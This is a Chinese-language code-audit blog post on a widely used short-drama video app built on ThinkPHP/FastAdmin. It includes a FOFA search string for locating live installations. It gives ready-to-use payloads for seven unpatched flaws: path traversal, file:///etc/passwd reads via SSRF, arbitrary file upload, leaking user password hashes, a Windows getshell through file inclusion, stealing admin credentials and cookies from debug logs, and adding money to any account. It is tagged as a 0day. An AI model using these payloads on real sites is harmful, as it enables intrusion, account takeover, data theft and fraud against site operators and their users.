2024年最新新小剧场短剧影视系统代码审计(RCE)

admin 2024年9月26日12:06:37评论26 views字数 8303阅读27分40秒阅读模式
2024年最新新小剧场短剧影视系统代码审计(RCE)

点击上方蓝字关注我们 并设为星标

0x00 前言

2024年最新新版小剧场短剧影视小程序源码+风口项目 ,短剧APP 小程序源码 风口项目 ,短剧app 小程序  H5  多端程序 对接了易支付,修复了众多BUG  目前已知BUG全部修复,看了下没有uniapp只有编译后的,用户量还挺大的.

Fofa:"/VwmRIfEYDH.php"

2024年最新新小剧场短剧影视系统代码审计(RCE)2024年最新新小剧场短剧影视系统代码审计(RCE)2024年最新新小剧场短剧影视系统代码审计(RCE)

框架:ThinkPHP 5.0.24 Fastadmin Debug:True

0x01 前台Lang文件读取漏洞

框架为Fastadmin写的,正好之前Fastadmin出了个任意文件读取的洞,直接就可以打,在/application/index/controller/Ajax.php 中,传入参数后进入到了loadlang()函数,我们追踪一下.

/** * Ajax异步请求接口 * @internal */class Ajax extends Frontend{  protected $noNeedLogin = ['lang'];  protected $noNeedRight = ['*'];  protected $layout = '';  /**     * 加载语言包     */  public function lang(){    header('Content-Type: application/javascript');    header("Cache-Control: public");    header("Pragma: cache");    $offset = 30 * 60 * 60 * 24; // 缓存一个月    header("Expires: " . gmdate("D, d M Y H:i:s", time() + $offset) . " GMT");    $controllername = input("controllername");    $this->loadlang($controllername);    //强制输出JSON Object    $result = jsonp(Lang::get(), 200, [], ['json_encode_param' => JSON_FORCE_OBJECT | JSON_UNESCAPED_UNICODE]);    return $result;  }

进入到了 /common/controller/Api.php 的loadlang中,直接调用Load函数包含../lang/xxx.php 文件

/*** 加载语言文件* @param string $name*/protected function loadlang($name){  $name =  Loader::parseName($name);  Lang::load(APP_PATH . $this->request->module() . '/lang/' . $this->request->langset() . '/' . str_replace('.', '/', $name) . '.php');}

所以我们只需要传入lang=../../application/database 即可跨目录读取数据库文件.

Payload:

/index/ajax/lang?lang=../../application/database

2024年最新新小剧场短剧影视系统代码审计(RCE)

0x02 前台任意文件读取漏洞

位于 /api/controller/Ems.php 控制器中的 juhecurl 方法存在curl_exec函数,且传参url可控,并且支持POST发包请求,导致漏洞产生.

/*** 请求接口返回内容* @param  string $url [请求的URL地址]* @param  string $params [请求的参数]* @param  int $ipost [是否采用POST形式]* @return  string*/function juhecurl($url,$params=false,$ispost=0){  $httpInfo = array();  $ch = curl_init();  curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 );  curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22' );  curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT , 30 );  curl_setopt( $ch, CURLOPT_TIMEOUT , 30);  curl_setopt( $ch, CURLOPT_RETURNTRANSFER , true );  if( $ispost )  {    curl_setopt( $ch , CURLOPT_POST , true );    curl_setopt( $ch , CURLOPT_POSTFIELDS , $params );    curl_setopt( $ch , CURLOPT_URL , $url );  }  else  {    if($params){      curl_setopt( $ch , CURLOPT_URL , $url.'?'.$params );    }else{      curl_setopt( $ch , CURLOPT_URL , $url);    }  }  $response = curl_exec( $ch );  if ($response === FALSE) {    //echo "cURL Error: " . curl_error($ch);    return false;  }  $httpCode = curl_getinfo( $ch , CURLINFO_HTTP_CODE );  $httpInfo = array_merge( $httpInfo , curl_getinfo( $ch ) );  curl_close( $ch );  return $response;}

Payload:

GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

2024年最新新小剧场短剧影视系统代码审计(RCE)读取数据库(需绝对路径):2024年最新新小剧场短剧影视系统代码审计(RCE)

0x03 前台任意文件上传漏洞

注意 这里需要登录,普通用户权限即可 访问 /index/user 可直接注册登录.

位于 /api/controller/User.php 控制器中的 avatar 方法 通过input()函数POST传入base64参数,然后进入了base64_image_content 方法,我们追踪一下.

/*** 上传头像*/public function avatar(){  if(input('base64')){    return action('api/common/base64_image_content');  }  return action('api/common/uploadavatar');}

最终在 /api/controller/Common.php 控制器中找到该方法. 其通过POST传入base64之后,直接将解码后的文件通过File_put_contents() 函数写入到 /uploads/时间/rand(10000, 99999).php 中.

/*** 上传头像base64* @ApiMethod (POST)* @param File $file 文件流*/public function base64_image_content(){  //匹配出图片的格式  $base64_image_content=input('base64');  if (preg_match('/^(data:s*image/(w+);base64,)/', $base64_image_content, $result)){    $type = $result[2];    $timeYmd=date('Ymd',time());    $new_file = ROOT_PATH . '/public/uploads/'.$timeYmd."/";//本地目录    if(!file_exists($new_file)){      //检查是否有该文件夹,如果没有就创建,并给予最高权限      mkdir($new_file, 0700);    }    $filename = Md5(date('ymdh', time()) . rand(10000, 99999)).".{$type}";//文件名字    $uploadDir="/uploads/".$timeYmd."/".$filename;//文件地址保存数据库 相对地址    if (file_put_contents($new_file.$filename, base64_decode(str_replace($result[1], '', $base64_image_content)))){      $rowUser = model('User')->get($this->auth->id);      if (!$rowUser) {        $this->error(__('No Results were found'));      }      $rowUser->allowField(true)->save(['avatar'=>$uploadDir]);      $this->success(__('Upload successful'), [                     'url' => $uploadDir                     ]);    }else{      $this->error('上传错误');    }  }else{    $this->error('格式错误');  }}

Payload:

POST /api/user/avatar HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 73Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=qt0rrvopobbbvibu6f8p9lr42rHost: 127.0.0.1Origin: http://127.0.0.1Referer: http://127.0.0.1/api/user/avatarUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36base64=

2024年最新新小剧场短剧影视系统代码审计(RCE)

0x04 前台未授权访问漏洞

在 /api/controller/Index.php 控制器的index方法中,很明显地存在 where 查询网站信息及User表中的字段,并且将所有用户枚举出来,且因为 $noNeedLogin = ['*'] 导致所有接口都无权限验证.

<?phpnamespace appapicontroller;use appcommoncontrollerApi;/** * 首页接口 */class Index extends Api{  protected $noNeedLogin = ['*'];  protected $noNeedRight = ['*'];  /**     * 首页     *     */  public function index(){    $config=$this->config();    $configs=config('site');    $map['ishot']=2;    $map['endtimesjc']=['>',time()];    if(input('uid',0)>0){      $map['uid']=input('uid');    }    $list =  model('Task')      ->with('users')      ->where($map)      ->limit(10)      ->select();    if($list){      foreach ($list as $k=>$v){        $list[$k]['createtime']=date('Y-m-d H:i',$v['createtime']);        if(isset($v['users']['avatar'])){          if(strpos($v['users']['avatar'],'http') !== false){             $list[$k]['avatar']=$v['users']['avatar'];          }else{            if($v['users']['avatar']){              $list[$k]['avatar']= $configs['imgurl'].$v['users']['avatar'];            }else{              $list[$k]['avatar']=$configs['imgurl'].'/uploads/20200523/250b3f89b40ff3714b07cc51b4c2f63d.png';            }          }         }else{          $list[$k]['avatar']=$configs['imgurl'].'/uploads/20200523/250b3f89b40ff3714b07cc51b4c2f63d.png';        }      }    }    $data=['config'=>$config,'doctor'=>$list];    $this->success('请求成功',$data);  }

Payload:

/api/index

里边了加盐的MD5密码以及邮箱地址.2024年最新新小剧场短剧影视系统代码审计(RCE)

0x05 FastAdmin GetSehll

[仅限Windows下可利用]

在查看ThinkPHP 框架控制器本身是否存在漏洞的同时,也要看看是否有Fastadmin,Thinkadmin这种后台框架的使用,这种后台框架也是可能存在漏洞的.

很幸运,这套系统是用的Fastadmin作为后台框架,且开了前台用户注册,满足历史漏洞条件.

在 /index/controller/User.php 中的_empty方法可控,导致传入到fetch函数,造成任意文件包含.

/*** 空的请求* @param $name* @return mixed*/public function _empty($name){    $data = Hook::listen("user_request_empty", $name);    foreach ($data as $index => $datum) {      $this->view->assign($datum);    }    return $this->view->fetch('user/' . $name);  }

追踪一下fetch函数,内置模板引擎的fetch方法, 这个方法实际上就是将要输出的页面内容赋值给一个变量,为了方便,thinkphp在对模板渲染的过程中,添加了php标签功能,使得其可以解析php代码

public function fetch($template, $data = [], $config = []){    if ('' == pathinfo($template, PATHINFO_EXTENSION)) {      // 获取模板文件名      $template = $this->parseTemplate($template);    }    // 模板不存在 抛出异常    if (!is_file($template)) {      throw new TemplateNotFoundException('template not exists:' . $template, $template);    }    // 记录视图信息    App::$debug && Log::record('[ VIEW ] ' . $template . ' [ ' . var_export(array_keys($data), true) . ' ]', 'info');    $this->template->fetch($template, $data, $config);  }

所以我们首先需要在 /index/user/register.html 注册一个账号,然后登录,之后点Profile-Click to edit上传头像,符合其规则即可.

2024年最新新小剧场短剧影视系统代码审计(RCE)

之后可以通过F12追踪标签或者查看源码拿到上传的图片地址

2024年最新新小剧场短剧影视系统代码审计(RCE)

之后咱们就可以直接通过 _empty 来包含文件实现Getshell了

Payload:

/index/user/_empty?name=../上传的图片地址

2024年最新新小剧场短剧影视系统代码审计(RCE)

当然,由于利用链其本身的缺陷,只能在Windows 下实现包含效果,这里网上文章有详细分析,不多说了.

0x06 任意文件读取+Log日志泄露组合拳

这套系统开了Debug,同时也开了日志记录,也就是说在 /runtime/log/ 目录下会实时生成日志,包括管理员的访问日志也在其中,正常来说网站是绑定在Public目录下的,咱们无法读取,但可以通过任意文件读取漏洞来跨目录读取这些日志.

Payload:

/api/ems/juhecurl?url=file:///D:/phpstudy_pro/WWW/runtime/log/202406/29.log

Windows下需要打个绝对路径,直接让网站报错即可,Linux下只需 ../ 跨出去即可

这里日志规则为: /年(4位)月(2位)/日(2位).log

2024年最新新小剧场短剧影视系统代码审计(RCE)

直接读取看起来是没有换行啥的,咱们直接Ctrl+S保存网页到本地即可,打开是有换行的,这里能看到登录时明文的账号密码,直接Ctrl+F搜索 admin 即可找到管理员日志2024年最新新小剧场短剧影视系统代码审计(RCE)而且还能看到管理员登录成功之后的Cookie,直接替换即可登录进入.

2024年最新新小剧场短剧影视系统代码审计(RCE)

同时这个点也能用来寻找后台地址,一般后台地址都会被改掉,而不是默认的 VwmRIfEYDH.php

0x07 前台水平越权漏洞

在 /api/controller/Mytask.php 控制器中,money方法存在逻辑缺陷,仅验证了用户的Session,其money user_id id 均可控,导致登陆后可随意增加任意用户金钱.

public function money($money,$user_id,$id,$sxf=0){  $user = $this->Usermodel::get($user_id);  if ($user && $money != 0) {    $before = $user->money;    $after = $user->money + $money;    //更新会员信息    $user->save(['money' => $after]);    //写入日志    MoneyLog::create(['user_id' => $user_id, 'money' => $money, 'before' => $before, 'after' => $after,'fid' => $id, 'sxf' =>$sxf,'memo' => '用户佣金']);  }else{    $this->error(__('金额不对'));   }}

其中user_id 可以在Cookie中查看到,只需要知道对方id,即可给对方或自己随便增加金钱

2024年最新新小剧场短剧影视系统代码审计(RCE)

Payload:

2024年最新新小剧场短剧影视系统代码审计(RCE)

2024年最新新小剧场短剧影视系统代码审计(RCE)

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE

最新短剧源码关注公众号发送 240901 获取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):2024年最新新小剧场短剧影视系统代码审计(RCE)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月26日12:06:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024年最新新小剧场短剧影视系统代码审计(RCE)https://cn-sec.com/archives/3118943.html

发表评论

匿名网友 填写信息